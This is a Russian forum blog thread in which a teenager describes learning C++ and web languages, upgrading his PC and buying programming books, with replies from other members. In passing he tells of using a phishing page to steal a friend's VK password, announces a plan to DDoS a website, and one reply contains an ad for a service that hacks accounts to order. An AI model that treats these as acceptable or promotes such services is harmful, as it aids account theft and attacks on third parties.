PDA

Просмотр полной версии : Блог vladyx'и

Страницы : [1] 2

vladyxa13
04.05.2013, 01:00
Комментируем

Dark Watch
Что то мало верится что в 5-6 лет ты начал изучать С++,да и вообще что полезь в гугл пробивать элементы игры тд.Т.к дети возрасте 5-6 лет и писать толком не умеют,а уж темболее на клавиатуре.
Если бы это все было так,то у тебя уже были бы очень хорошие знания,а хороших знаний я толком от тебя еще не видел.

vladyxa13
Цитата:

Сообщение от Dark Watch

Что то мало верится что в 5-6 лет ты начал изучать С++,да и вообще что полезь в гугл пробивать элементы игры тд.Т.к дети возрасте 5-6 лет и писать толком не умеют,а уж темболее на клавиатуре.
Если бы это все было так,то у тебя уже были бы очень хорошие знания,а хороших знаний я толком от тебя еще не видел.

Я клавиатурой научился пользоваться и мишкой, а не С++ учить.

Dark Watch
Ты несешь полный бред,ты писал в блоге что увидел как играл дядя в игры,пошел пробивать в гугле что да как,тебе выбило что это исходный код и тд,потом ты пробил что такое исходный код,тебе выбило что это язык программирование,потом ты пошел на ютуб учить С++,ну нечего не понял,и через год уже опять захотел учить и выучил за 3.5 дней html (а тебе тогда было 6-7 лет),это не реально в таком возрасте,это не стих выучить и тд,тут надо не плохая практика с самим компьютером,а что уже говорить про html да еще и за 3.5 дней.В 10 лет это уже реально,и то хорошая память надо и практика с компьютером.
З.ы я не придираюсь к тебе,просто если создаешь блог то пиши в нем правду,а не строй с себя второго эйнштейна

vladyxa13
Цитата:

Сообщение от Dark Watch

Ты несешь полный бред,ты писал в блоге что увидел как играл дядя в игры,пошел пробивать в гугле что да как,тебе выбило что это исходный код и тд,потом ты пробил что такое исходный код,тебе выбило что это язык программирование,потом ты пошел на ютуб учить С++,ну нечего не понял,и через год уже опять захотел учить и выучил за 3.5 дней html (а тебе тогда было 6-7 лет),это не реально в таком возрасте,это не стих выучить и тд,тут надо не плохая практика с самим компьютером,а что уже говорить про html да еще и за 3.5 дней.В 10 лет это уже реально,и то хорошая память надо и практика с компьютером.
З.ы я не придираюсь к тебе,просто если создаешь блог то пиши в нем правду,а не строй с себя второго эйнштейна

Я не помню точных дат, я не эйнштейн.
Я выучил хтмл лет в девять.
Буду писать конкретные даты.

Dark Watch
Цитата:

Сообщение от vladyxa13

Я не помню точных дат, я не эйнштейн.
Я выучил хтмл лет в девять.
Буду писать конкретные даты.

Все ясно брыхло ты еще то),надеюсь сейчас хоть его знаешь.

vladyxa13
Да я его повторял, написано же.

vladyxa13
Доброго времени суток дорогие пользователи форума antichat!!!

Я решил создать свой блог. Буду заполнять по мере возможностей.

И так раскажу немножко о себе:
С детства хотел стать программистом, писать игры и программы.На данный момент учу/знаю: С++,CSS,HTML,PHP. Я о себе могу сказать то что я веселый, добрый и ленивый.

Как я познакомился с Computer Science и интернетом:
Сначала все началось с простого дерганья мишкой.Потом понял как пользоваться правой кнопкой мыши, после этого полез в интернет(это было в лет 5-6), научился пользоваться левой кнопкой мыши и роликом.Смотрел как мой дядя играет на компе и мне захотелось узнать, как и с чего составляется игра.Задал гуглу вопрос и он сказал что игра состоит из различных элементов,исходного кода.Я не люблю рисовать, поэтому сразу отпала идея создавать графику.Мне нравится думать, я люблю математику.Опять вопрос что такое исходный код?Мне ответ - это файл который написан на языке программирования и выполняет различные функции.Поискал самые популярные языки программирования и нашел С++. Я пошел на ютуб ввел запрос и попал на уроки.Меня затянуло, понравился язык, но путем ниче не понял.Прошел год и меня опять потянуло к разработке.В этот раз я учил HTML и за 3-5 дней его освоил(в данный момент я смеюсь, как долго его учил потому-что повторил его за 2 часа). Начал учить CSS, но стили не подключались и я бросил эти языки.Вернулся к С++, опять прошел те уроки понял чуть больше, но не понимал основ.Перерыв 2 года...Ну тянет меня к программированию хочу творить и решать нелегкие задачки и колупаться в коде. Пошел опять на ютуб забил в поиске "уроки по С++" полистал, посмотрел и нашел человека который хорошо объясняет, дает базовые знания, объясняет большинство ошибок, дает теорию. Начал учить С++ с новой силой, понял все что он объяснял.Дошел пока до циклов.Думаю это последний подход и С++ больше не брошу.Захотелось вспомнить HTML, вспомнил язык за 2-3 часа, в курсе рассказывалось о PHP, я начал немножко кодить на нем но пока не сильно, после хтмл пошел на СSS, начал изучать, все получается, прошел где-то 20% языка \ учу пока.

Фейки и хак:
Нашел на ютубе наказание читеров смотрел, угарал, потом увидел постановочный выпуск в котором был "наказателем" и тот кто "жертва". Подписался на него. В одном его видео увидел фейк на тюрягу, а он говорил, что такой платно продает чувачек, дал его данные. В коменте под видео было написано, что такие фейки делаются через PHP Devel Studio 2010, посмотрел как делать.Скачал девель начал сверятся с видео, узнал что такое сниффер. Сделал фейк на Вк голоса и на первое апреля своровал у друга пароль от вк. Написал в меседжбокс - "Спервым апреля. Вас успешно наебали пароль и логин сворованы". Вот как-то так первый взлом прошел.
Кто знает хорошие книги по хаку и кому не трудно дайте хоть название.

HPC.name

Перешел по ссылке "форум", вижу С++, вопросы задавать можно.Зарегался. Задал вопрос - "Как написать чат на С++?"- Ответили мне.Понравился форум - люди добрые и отзывчивые. Увидел активацию - подумал что это нечто особенное.Написал нашему любимому модеру Ник Хадеру:"активируй меня ПОЖАлуйста". Захожу на следущий день мне бан --- нарушение правил форума - написал я однажды "учи С++"- поумничал ;понял свою ошибку, после бана я осознал, как важно быть адекватом.
Цитата:

Nick Hander без обид

Начал думать о активации, через недельку после бана зашел в чат, стал общаться, спрашивать про активацию, познакомился с task-imho начал его клянчить про активацию, он не мог меня активировать, ему репа не позволяла. Потом зашел Wcfs с ним поговорил, подружился, он меня и активировал, ему большое спасибо.
Однажды сижу в чате, бах новичок сразу активируйте меня срочно, мы с task-imho говорим зачем тебе активация он говорит надо,
мы ну зачем он нужна хочу, я говорю репа не позволяет, таск - и у меня тоже, проси у тех у кого 10+ ,новичек говорит отправил модеру письмо, потом еще 3 людям. Его забанили за флуд(написал где не положено). Хочу с этого примера сказать новичкам, что не активация и не цвет ника важны, а знания и опыт. Мне здесь нравится, никогда не видел форумов такого уровня.Мы учимся на своих ошибках, но иногда правило " мудрец отличается от глупца тем, что мудрец учится на ошибках глупца, а глупец на своих" - не срабатывает.

Nick Hander
Цитата:

понял свою ошибку, после бана я осознал, как важно быть адекватом.

Молодец, что делаешь правильные выводы. Приятно, когда юзеры исправляются.

Цитата:

Однажды сижу в чате, бах новичок сразу активируйте меня срочно

Активация заслуживается как минимум активностью на форуме, авансом она никому не выдается.

vladyxa13
Люди не идеальны, они всю жизнь учатся чему-то новому и познают мир.

task-imho
Мне понравился блог. Супер +++++

1Nytu
05.05.2013, 01:00
Интересний блог буду читать)

LakyBoy
Какой сейчас твой возраст, если не секрет?

И, с чего рекомендуешь начинать(или с какого языка) изучение языков программирования?

vladyxa13
Цитата:

Сообщение от LakyBoy

И с чего рекомендуешь начинать(или с какого языка) изучение языков программирования?

Начинай с HTML, он легкий и ты поймешь смысл языков программирования, для чего они нужны.
А вообще начинай учить, тот язык программирования какой тебе по душе.Мне например С++ очень нравится.
Посмотри исходный код языков, попытайся понять на каком тебе легче писать и как ты его воспринимаешь.
Я только недавно понял, что все языки программирования похожи между собой очень сильно, но об этом ждите рассказ.
Если надо могу посоветовать уроки по языкам у профи дам ссылки.

LakyBoy
Цитата:

Сообщение от vladyxa13

Начинай с HTML, он легкий и ты поймешь смысл языков программирования, для чего они нужны.
А вообще начинай учить, тот язык программирования какой тебе по душе.Мне например С++ очень нравится.
Посмотри исходный код языков, попытайся понять на каком тебе легче писать и как ты его воспринимаешь.
Я только недавно понял, что все языки программирования похожи между собой очень сильно, но об этом ждите рассказ.
Если надо могу посоветовать уроки по языкам у профи дам ссылки.

Ну у меня нет такой истории как у тебя. Я начинал с обычных игр на сеге, потом увидел компьютер.Потом, как как тетя зашла в почту, попросил научить. Очень понравился компьютер. Ну мой первый язык был PHP, т.к. начал лазить по чит сайтам(играл и играю по сей день в онлайн игры) и увидел слово фейк. Стало интересно, гуглил, яндексил, ютюбил. Наютюбил видео про фейки. Вот моя история про то, как я узнал о языках программирования.

vladyxa13
Цитата:

Сообщение от LakyBoy

Ну у меня нет такой истории как у тебя. Я начинал с обычных игр на сеге, потом увидел компьютер.Потом, как как тетя зашла в почту, попросил научить. Очень понравился компьютер. Ну мой первый язык был PHP, т.к. начал лазить по чит сайтам(играл и играю по сей день в онлайн игры) и увидел слово фейк. Стало интересно, гуглил, яндексил, ютюбил. Наютюбил видео про фейки. Вот моя история про то, как я узнал о языках программирования.

У каждого своя история и она довольно интересна.

vladyxa13
09.05.2013, 01:00
Привет всем, поздравляю всех с Днем Победы!!!
Поздравление в этой теме https://hpc.name/showthread.php?t=46075
Желаю ветеранам крепкого здоровья и долголетия!

vladyxa13
12.05.2013, 01:00
Цитата:

Сообщение от Dark Watch

УДАЛЯЙ ЕГО

Нах удалять, компик старый, через недельки две обновляться буду.(так и обновился)
А так с антивиром потерплю.

vladyxa13
Цитата:

Сообщение от 1Nytu

На какую тематику делаешь?

Не на какую. Просто закрепление знаний HTML,CSS. А так наполнение будет мой блог, точнее первый пост блога.

vladyxa13
Вот давненько коплю на комп, а то старый задрал, буду на нем свои тесты проводить. Короче я когда вижуал С++ запускаю, то строятся проекты примерно минуты 3. Запуск компа производится за 5 минут +\- . Потом надо обязательно перелагать, аж после этого можно спокойно работать.Стоит на старом добрая ХР.
На новый поставлю 7, Боже упаси ставить 8.
Характеристики старого компа(на каком сейчас сижу):

Цитата:

Процессор: Intel Pentium 4; 1 ядро; 2.66 ГГц
ОЗУ: DDR 1024 Mb
Мат. плата:(не помню название, но на Socket 775)
Видеокарта: NVidia GeForce GT 6600
Жесткий диск: Примерно на 40 Gb

Новый комп(в планах покупки):

code:

Процессор: Intel Core i7 3700K; 4 ядра с поддержкой Hyper-Threading; 3.5 ГГц; Поколение Ivy Bridge;
ОЗУ: DDR3 8096 Mb
Мат. плата:Asus P8Z77-V Socket 1155
Видеокарта: Asus NVidia GeForce GTX 660(GTX660-DC2TG-2GD5)
Жесткий диск:1 Tb - 1024Gb
Блок питания: Cooler Master GX 750W
Корпус:Zalman Z9 Plus Black

BlackH
Цитата:

Сообщение от vladyxa13

Запуск компа производится за 5 минут +\- . Потом надо обязательно перелагать, аж после этого можно спокойно работать.Стоит на старом добрая ХР.

Печаль))
Завтра зафоткаю свой старый комп.У меня там XP летала и там я вкусил все тонкости оптимизации.
Точно не помню,завтра гляну.Но там было озу не больше 128 и проц 300мегов))
Я умудрялся на ней и кодить и хекать.
Смотрю сейчас на твои параметры,вспоминаю свои и не понимаю как там у тебя может что-то лагать.
Хотя догадываюсь почему так.Я Маме своей поставил практически такие же железки(проц по старее) ОС xp и всё летает.
Эх,учитесь правильно настраивать ОС...

vladyxa13
Цитата:

Сообщение от BlackH

Печаль))
Завтра зафоткаю свой старый комп.У меня там XP летала и там я вкусил все тонкости оптимизации.
Точно не помню,завтра гляну.Но там было озу не больше 128 и проц 300мегов))
Я умудрялся на ней и кодить и хекать.
Смотрю сейчас на твои параметры,вспоминаю свои и не понимаю как там у тебя может что-то лагать.
Хотя догадываюсь почему так.Я Маме своей поставил практически такие же железки(проц по старее) ОС xp и всё летает.
Эх,учитесь правильно настраивать ОС...

Оно долго грузит потому, что я как Бог еще стим подгрузится. У меня ХР с паком 3. Вся проблема в оперативе, скайп жрет ~50мб и долбаный антивир под 100мб. Надо почистить окошко быстрого запуска. Без включеных прог винда кушает 400-600 мб

longman2142
Цитата:

Сообщение от vladyxa13

Оно долго грузит потому, что я как Бог еще стим подгрузится. У меня ХР с паком 3. Вся проблема в оперативе, скайп жрет ~50мб и долбаный антивир под 100мб. Надо почистить окошко быстрого запуска.

У меня тоже xp sp3, ха 50-60 секунд полностью грузиться, винду не менял 3,5 года, ракета вообщем

P.S - правда оперативки 3 гига.

vladyxa13
Цитата:

Сообщение от longman2142

P.S - правда оперативки 3 гига.

Сравнил 1 и 3 =)

longman2142
Цитата:

Сообщение от vladyxa13

Сравнил 1 и 3 =)

Когда 1 гиг был, грузился полностью максимум за 1 мин. 10-20 сек.

vladyxa13
Цитата:

Сообщение от longman2142

Когда 1 гиг был, грузился полностью максимум за 1 мин. 10-20 сек.

Если без прог в панельке то грузится примерно 40-60 сек.
Надо убрать хамачи и т п.

BlackH
ДА там не в панельках суть а в автозапуске.
Сколько у тебя там прог шт. 40 наверно?))
+ ко всему каждая еще ломится за обновами когда хочет?

vladyxa13
Цитата:

Сообщение от BlackH

ДА там не в панельках суть а в автозапуске.
Сколько у тебя там прог шт. 40 наверно?))
+ ко всему каждая еще ломится за обновами когда хочет?

я просто забыл как автозапуск называется, дырявая голова.
Ща чистить буду.

1Nytu
Цитата:

Сообщение от vladyxa13

Не на какую. Просто закрепление знаний HTML,CSS. А так наполнение будет мой блог, точнее первый пост блога.

Понятно.Удачи в закреплении знаний.

vladyxa13
Цитата:

Сообщение от 1Nytu

Понятно.Удачи в закреплении знаний.

Спасибо!

Dark Watch
Цитата:

Сообщение от vladyxa13

я просто забыл как автозапуск называется, дырявая голова.
Ща чистить буду.

А говорил хорошая память)

Nick Hander
Цитата:

Новый комп(в планах покупки):

Лучше подожди немного, скоро выйдет свежее поколение intel core на хасвелле и плату на 1150 сокете возьмешь. Как-никак, будет актуальная версия, а 1155 будет уже устаревшей платформой. Все-таки приятнее сидеть на актуальном железе, особенно когда только что его купил.
Если будет дороговато, то можно будет взять что-то типа intel core i5 4570K, а не core i7 4770k. Разница совсем небольшая будет. А лучше возми блок подешевле на 600 или 650 ватт, которых тебе хватит с головой, а на сэкономленные деньги возьмешь проц нового поколения взамен старого.

vladyxa13
Делаю сайт.....
Выложу когда доделаю.
HTML,CSS,JS
Так хреново писать потому, что комп лагает и антивир просит обнову. Решил заткнуть его, но комп еще сильней лагать начал, перезагружаю свой ящиик.
Звук пропал. Думаю згорела звуковая карта.
Все норм, после перезагрузки аж с места вскочил от музла на всю в наушниках

Цитата:

Веб кодинг я закинул, перешел на сис, но когда-то я буду учить веб, вот тогда его и запилю
vladyxa13
25.10.2013

1Nytu
Цитата:

после перезагрузки аж с места вскочил от музла на всю в наушниках

ZoRKeG
Зачем антивирус компьютеру -__- Я себе последний раз устанавливавл может в 2005-2006 году.. точно не помню, заюзал его на пару минут и снес, точнее, ели снес

vladyxa13
Цитата:

Сообщение от ZoRKeG

Зачем антивирус компьютеру -__- Я себе последний раз устанавливавл может в 2005-2006 году.. точно не помню, заюзал его на пару минут и снес, точнее, ели снес

Я не знаю, стоит у меня фигня AVG, а антивир - это чеб для приличия, типа вирусы отбивает.

Dark Watch
Цитата:

Сообщение от vladyxa13

Я не знаю, стоит у меня фигня AVG, а антивир - это чеб для приличия, типа вирусы отбивает.

УДАЛЯЙ ЕГО

1Nytu
Цитата:

Делаю сайт.....

На какую тематику делаешь?

vladyxa13
13.05.2013, 01:00
Цитата:

Сообщение от Nick Hander

Лучше подожди немного, скоро выйдет свежее поколение intel core на хасвелле и плату на 1150 сокете возьмешь. Как-никак, будет актуальная версия, а 1155 будет уже устаревшей платформой. Все-таки приятнее сидеть на актуальном железе, особенно когда только что его купил.
Если будет дороговато, то можно будет взять что-то типа intel core i5 4570K, а не core i7 4770k. Разница совсем небольшая будет. А лучше возми блок подешевле на 600 или 650 ватт, которых тебе хватит с головой, а на сэкономленные деньги возьмешь проц нового поколения взамен старого.

По любому комп куплю где-то в конце мая, начало июня, а интел хасвел выходит 27 мая, вот и посмотрю на цену. Может даже под осень куплю, железки подешевеют.

vladyxa13
Цитата:

Сообщение от Dark Watch

А говорил хорошая память)

На что, на мелкие вещички какими я не пользуюсь)))

LakyBoy
Да, сам видел, комп у тебя далеко не тру . Желаю поскорей обзавестись новым компом и дописать сайт)

vladyxa13
Цитата:

Сообщение от LakyBoy

Да, сам видел, комп у тебя далеко не тру . Желаю поскорей обзавестись новым компом и дописать сайт)

Пасиб...

Цитата:

Комп тогда, я так и не купил , да и ща не знаю куплю или нет. Думаю в эту зимушку будет..надеюсь...
vladyxa13
13.11.2013

tarasleon2000000
16.05.2013, 01:00
Цитата:

и дописать сайт)

Что за сайт ? Выкладывай

vladyxa13
16.05.2013, 01:00
Цитата:

Сообщение от tarasleon2000000

Что за сайт ? Выкладывай

Скоро.........

vladyxa13
19.05.2013, 01:00
Тут чето о говносайте заговорили http://askbook.me (https://hpc.name/redirector.html#http://askbook.me) решил по ДДоСить

Цитата:

Была бредовая, нубская идея...Опыта было мало, знаний тож, но маштабные веб сервисы не могут ЗаДДоСить три человека...
vladyxa13
13.11.2013

ChEcHeNeC
Отличный блог! Удачи в развитии

vladyxa13
Цитата:

Сообщение от ChEcHeNeC

Отличный блог! Удачи в развитии

пасиба))

ZoRKeG
22.05.2013, 01:00
Цитата:

Сообщение от vladyxa13

Установил пакет обновления на винду, теперь комп летает, для меня сказка - загрузка за 30-50 сек.

О_о У меня секунд 12-20, смотря какое у него настроение

vladyxa13
22.05.2013, 01:00
Установил пакет обновления на винду, теперь комп летает, для меня сказка - загрузка за 30-50 сек.

vladyxa13
23.05.2013, 01:00
Цитата:

Сообщение от ZoRKeG

О_о У меня секунд 12-20, смотря какое у него настроение

С моими характеристиками только и 5 запускаться....

vladyxa13
25.05.2013, 01:00
Решил немного обновить блог.

vladyxa13
Вчера отрубили интернет, потом пошел на треньку пришел, думаю сейчас запашет, зайду на НРС и ..... Но нета не было, заскучал, потом идея разберу нука я комп заодно почищу, разобрал пылюги сколько было.....много. В маленьком куллере видяхи (https://hpc.name/redirector.html#http://i46.fastpic.ru/big/2013/0525/17/326afa5165487ef6256d143032c2e517.jpeg) я в шоке был. Вынес комп в общий коридор, включил фен и посыпалась пыль которая хранилась больше полугода. Давненько без нета сидел, так вспомнил что такое телик - не очень понравилось одно и тоже быстро надоедает. Так вот собрал комп, запустил, вижу интернет не включили. Думаю что же надо делать и придумал: полезу пошарюсь в винде.
Зашелв папку "Windows" начал лазить и тут я понял почему лагает комп, части ядра винды сжаты, когда й меня закончилось место на жестянке то запустился автоматически архиватор старых неиспользованных файлов, под его сжатие попало ядро оно же не используется юзером.

Самое главное, что если бы было, что делать люди бы не сидели в нете.

Мое рабочее место (там небольшой бардак)

http://i48.fastpic.ru/big/2013/0525/...5e6501e96.jpeg (https://hpc.name/redirector.html#http://i48.fastpic.ru/big/2013/0525/96/bf1c84c953c76548e2cbb4a5e6501e96.jpeg)

vladyxa13
Надо было мне съездить в одно место сегодня. Возвращался обратно и пришла идея съездить в ближайший торговый центр. Погулял там, покушал морожку и зашел в книжный магазин. Увидел много полезной инфы по программированию. Чуть ниже расскажу про те книги. Так потом друг пришел мы погуляли, пришел домой, включили нет.

Когда с другом гуляли, то зашли на детскую площадку покататься на качельках. Сели , катались катались и увидели такую ужасную картину: Пьяный мужик(наверное отец) бьет свою жену при детях, как дал ей плюху, она вскрикнула и чуть не заревела. Вот как-то так живем. Был во Львове, как-то сидел на лавочке и тут пьяный мужик с камнем ко мне подходит, хочет кинуть, я так шугонул...шо пиз***

Люди водка убивает, не пейте много, а если вы уже выпили, то ляжте дома спать и проспитесь, а не выходите на улицу и делать глупости.

BlackH
Цитата:

Сообщение от vladyxa13

Зашелв папку "Windows" начал лазить и тут я понял почему лагает комп, части ядра винды сжаты, когда й меня закончилось место на жестянке то запустился автоматически архиватор старых неиспользованных файлов, под его сжатие попало ядро оно же не используется юзером.

Можно узнать как ты определил что фаилы ядра пожаты?
Не могу даже представить как это так работает ОС без ядра...

vladyxa13
Так вот зашел в книжный спросил где книги по ЯП, мне ответили, пошел в тот раздел, достал книгу "Программирование на С++" Авторы: С.В. Глушаков Т.В. Дуравкина Второе издание. Ссылка на описание и на бумажный формат http://new.iboox.ru/books/book/517054362 (https://hpc.name/redirector.html#http://new.iboox.ru/books/book/517054362) . В том книжном где я был она стояла 200 грн или 800 руб. Поеду на опт так куплю ее на 100 грн или 400 рубликов дешевле. Классная книга, мне понравилась. Зачитался я ее, но надо раставатся, не могу же я вечно в книжном маге сидеть. Расскажу ну ка про книгу по С#. "С# на примерах" автор : Бен Ватсон, чувачек работает в майкрософт, тоже забавная книга. Книгу и описание можно посмотреть здесь http://www.bookzone.com.ua/Netshop/c...gue_31344.html (https://hpc.name/redirector.html#http://www.bookzone.com.ua/Netshop/catalogue/catalogue_31344.html) .
Она стояла 160 грн\ 640 руб. Конецно же на опте по дешевке куплю. А так книга супер.
Бен Ватсон | С# 4.0 на примерах [DJVU] на rghost http://rghost.ru/46256931 (https://hpc.name/redirector.html#http://rghost.ru/46256931) и на торренте http://newtracker.org/showthread.php...816#post407816 (https://hpc.name/redirector.html#http://newtracker.org/showthread.php?p=407816#post407816) . По С++ выложу потом , если найду.

vladyxa13
Цитата:

Сообщение от BlackH

Можно узнать как ты определил что фаилы ядра пожаты?
Не могу даже представить как это так работает ОС без ядра...

Сейчас будут.

vladyxa13
Вот и скрины.

http://i47.fastpic.ru/big/2013/0525/...dfa6ef2b5b.jpg (https://hpc.name/redirector.html#http://i47.fastpic.ru/big/2013/0525/5b/2f461b686fd6b6b33a7817dfa6ef2b5b.jpg)

http://i47.fastpic.ru/big/2013/0525/...69261eb816.jpg (https://hpc.name/redirector.html#http://i47.fastpic.ru/big/2013/0525/16/ba531dac0f467bd497b00e69261eb816.jpg)

http://i46.fastpic.ru/big/2013/0525/...c7db1b61ae.jpg (https://hpc.name/redirector.html#http://i46.fastpic.ru/big/2013/0525/ae/b928d05b72ff21a9082151c7db1b61ae.jpg)

В 3 скрине все синее папки - это сжатые папки, в одной из них лежит то ядро 2 скрин

vladyxa13
Сайты справочники:
http://www.cplusplus.com/ (https://hpc.name/redirector.html#http://www.cplusplus.com/)
http://www.cppreference.com/ (https://hpc.name/redirector.html#http://www.cppreference.com/)
http://www.cprogramming.com/ (https://hpc.name/redirector.html#http://www.cprogramming.com/)
http://msdn2.microsoft.com/en-us/library/60k1461a.aspx (https://hpc.name/redirector.html#http://msdn2.microsoft.com/en-us/library/60k1461a.aspx)

Оформление кода:
http://geosoft.no/development/cppstyle.html (https://hpc.name/redirector.html#http://geosoft.no/development/cppstyle.html) (сам придерживаюсь)
http://www.possibility.com/Cpp/CppCodingStandard.html (https://hpc.name/redirector.html#http://www.possibility.com/Cpp/CppCodingStandard.html)
http://gcc.gnu.org/onlinedocs/libstd...intro/C++STYLE (https://hpc.name/redirector.html#http://gcc.gnu.org/onlinedocs/libstdc++/17_intro/C++STYLE)

ebooks:
http://forum.ru-board.com/topic.cgi?......488&start=0 (https://hpc.name/redirector.html#http://forum.ru-board.com/topic.cgi?forum=...488&start=0)
http://www.pdfchm.com/ (https://hpc.name/redirector.html#http://www.pdfchm.com/) (Есть все, но для скачивания требуется регистрация. ).
amazon.com + edonkey (Убойная связка).

BlackH
Ядро как бы тут лежало всегда C:\Windows\System32
А то что ты там показал вообще апдейты какие-то,или старые версии или бекапы.Префикс KB как бы намекает.

vladyxa13
Как задолбали меня эти файлообменники http://b00ok-filles.j7du.cp.cx/?r=24...D0%B0_2008_pdf (https://hpc.name/redirector.html#http://b00ok-filles.j7du.cp.cx/?r=2482&q=%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC %D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5+% D0%BD%D0%B0+C++_%D0%A1.+%D0%92.+%D0%93%D0%BB%D1%83 %D1%88%D0%B0%D0%BA%D0%BE%D0%B2%2C+%D0%A2.+%D0%92.+ %D0%94%D1%83%D1%80%D0%B0%D0%B2%D0%BA%D0%B8%D0%BD%D 0%B0_2008_pdf)
не дадут скачать нормально. Поискать еще надо.

Подскажите, если я введу номер что будет?

Все решен, проверил Sherlock_Holmes с липового номера просит 3,8 грн. Спасиб шерлок.

vladyxa13
Цитата:

Сообщение от BlackH

Ядро как бы тут лежало всегда C:\Windows\System32
А то что ты там показал вообще апдейты какие-то,или старые версии или бекапы.Префикс KB как бы намекает.

аа, ясно, хорошо, что ядро не задело

vladyxa13
29.05.2013, 01:00
Короче купил я книги.

C++ для "чайников" - Стефан Рэнди Дэвис не очень много воды, а от C++: базовый курс - Герберт Шилдт то что надо, прям как доктор прописал при начальном изучении С++. Там вообще нет отступления от темы и очень интересно читать, а то для чайников. реально для отсталых, но я ее прочитаю для общегго развития.

vladyxa13
29.05.2013, 01:00
Решился я сегодня с книгами по С++ . Буду брать:
C++ для "чайников" - Стефан Рэнди Дэвис (https://hpc.name/redirector.html#http://www.bookzone.com.ua/Netshop/catalogue/catalogue_29481.html)

C++: базовый курс - Герберт Шилдт (https://hpc.name/redirector.html#http://www.bookzone.com.ua/Netshop/catalogue/catalogue_13580.html)

Куплю, отпишусь, как книги. Покупаю сегодня.

Цитата:

Для чайников книга оказалась не айс, особенно когда появился опыт Справочник уже с моими потребностями не справляется, но для учебы Базовый курс - ОНО
Об этом речь ниже.
vladyxa13
13.11.2013

tolikzaharov
30.05.2013, 01:00
"C++ для "чайников" - Стефан Рэнди Дэвис (https://hpc.name/redirector.html#http://www.bookzone.com.ua/Netshop/catalogue/catalogue_29481.html)"

Улыбнул)

vladyxa13
Цитата:

Сообщение от tolikzaharov

"C++ для "чайников" - Стефан Рэнди Дэвис (https://hpc.name/redirector.html#http://www.bookzone.com.ua/Netshop/catalogue/catalogue_29481.html)"

Улыбнул)
Заказать взлом ВКонтакте (https://hpc.name/redirector.html#http://zakazvzloma.com/vzlom_vkontakte_na_zakaz.php), Взлом ВКонтакте на заказ (https://hpc.name/redirector.html#http://zakazvzloma.com/vzlom_vkontakte_na_zakaz.php), Заказать взлом почты (https://hpc.name/redirector.html#http://zakazvzloma.com/vzlom_pochty_na_zakaz.php)

Еще надо для кастрюль. Этот момент упустили
А в книжке автор говорил, что понял какой он великий чайник.

kipishnoy
каким компилятором пользоваться будешь?

vladyxa13
Цитата:

Сообщение от kipishnoy

каким компилятором пользоваться будешь?

Вижуал студио 2010, как по мне 2012 надо пробовать, но он смахивает на дизайн вин 8. Комп слабый, поэтому остановлюсь на вижуал 2010 экспресс

kipishnoy
Цитата:

Сообщение от vladyxa13

Вижуал студио 2010, как по мне 2012 надо пробовать, но он смахивает на дизайн вин 8. Комп слабый, поэтому остановлюсь на вижуал 2010 экспресс

Не жестко для новичка?

vladyxa13
Цитата:

Сообщение от kipishnoy

Не жестко для новичка?

Я уже программировал давненько в той среде и знаю немного как устроено студио. 1 ошибка и 1000 строчек СОС ХЕЛП.
Я немного знаю С++, хочу его полностью освоить.

tarasleon2000000
Тебе будет эффективней когда кто то покажет... С человеком намного легче заниматься чем по учебникам и манам! Может есть смысл пойти на курсы какие нибудь ? Ты ведь в Киеве живешь ? Да ? Там такого добра хватает,-только бабки плати....

vladyxa13
Цитата:

Сообщение от tarasleon2000000

Тебе будет эффективней когда кто то покажет... С человеком намного легче заниматься чем по учебникам и манам! Может есть смысл пойти на курсы какие нибудь ? Ты ведь в Киеве живешь ? Да ? Там такого добра хватает,-только бабки плати....

Хожу!! На курсы в академию "Инталит", должен был поступать на основы алгоритмизации, но финансы...не очень, но и от своей группы отставать не хочу!
только что решил проблему перенес занятия на август, самое главное, что от своей группы не отстану, которая проходит курс сейчас!

vladyxa13
Сегодня был у врача, проходил мед. осмотр. Захожу с утреца в поликлинику,очередь на человек 100 - грудничковый день. Иду до врача - ее нету. Дал медсестре заполнять форму. Сказала я тебе вынесу готовою, ты только подожди врача. Я сижу под кабинетом, читаю книжку по С++(не для чайников). потом, бах выходит врач из кабинета, говорит заходи. Я немного был в шоке, так дернули, пульс соответственно поднялся. Тут шутка от нее: "Сейчас 100 раз присядешь за одну минуту." Для меня это нормально, я приготовился. Потом она сказала, что присядь 30 раз. Я побырику(очень резко и быстро начал приседать), она чуть сбрось темп, а я не могу, со всей дуряки приседаю. Пульс вскочил, для моего организма 30 раз навсю котушку - эт мало. Я вообще готовился на 100 на время. Так дальше, начала считать по какой-то формуле, группу по физре. И вышла спец группа, типа пульс высокий нагрузка высокая. Где нагрузка 30 раз присесть? Я на треньке делаю 50+ кувырков, 50 отжиманий, 100+ приседаний. потом пошел на остановку жду троллейбуса, читаю что они написали в пункте болячки.

"мои болячки"
зрение(я с этим не спорю немного плохое зрение, но результаты, то записали проверки , которую проводили 1,5 года назад, полтора года!!)

потом у меня откудовато появились проблемы с сердцем

Проблемы с мышцами, тоже откудова-то взяли, наверное с потолка.

Мне еще приписали задышку, которой у меня нет!
Я был шокирован тем, что у меня никогда не проверяли пульс, на вступление в группу по физ-культуре.

vladyxa13
Что может Ctrl в Visual Studio

Одна простая клавиша Ctrl может значительно упростить работу в Visual Studio. Помимо типичных комбинаций, которые нам очень хорошо знакомы, существует также и большое количество других, менее известных, но от этого и более ценных.

Далее список того, что можно делать с клавишей Ctrl.

Редактирование и печать:

Ctrl+C, Ctrl+V, Ctrl+X, Ctrl+S — самое очевидное
Ctrl+P — мало ли, вдруг кому-то захочется распечатать свой код
Ctrl+Del, Ctrl+Backspace — удаление слова справа от курсора, слева от курсора
Ctrl+Enter, Ctrl+Shift+Enter — добавление строки над текущей, под текущей
Ctrl+J — завершение ввода выражения
Ctrl+U — перевод символа перед курсором в нижний регистр
Ctrl+Shift+U — перевод символа перед курсором в верхний регистр
Ctrl+= — выделение кода до предыдущего положения курсора
Ctrl+Left, Ctrl+Right — переход к предыдущему слову, следующему
Ctrl+Shift+Left, Ctrl+Shift+Right — выделение слова слева от курсора, справа от курсора
Ctrl+K, Ctrl+C(комбинация) — закомментирование строки
Ctrl+K, Ctrl+U(комбинация) — раскомментирование строки

Поиск и навигация:

Ctrl+F, Ctrl+Shift+F — поиск в документе, поиск в файлах
Ctrl+H, Ctrl+Shift+H — поиск с заменой в документе, поиск с заменой в файлах
Ctrl+F3, Ctrl+Shift+F3 — поиск выделенного текста в прямом и обратном направлениях
Ctrl+F4 — закрытие текущего окна
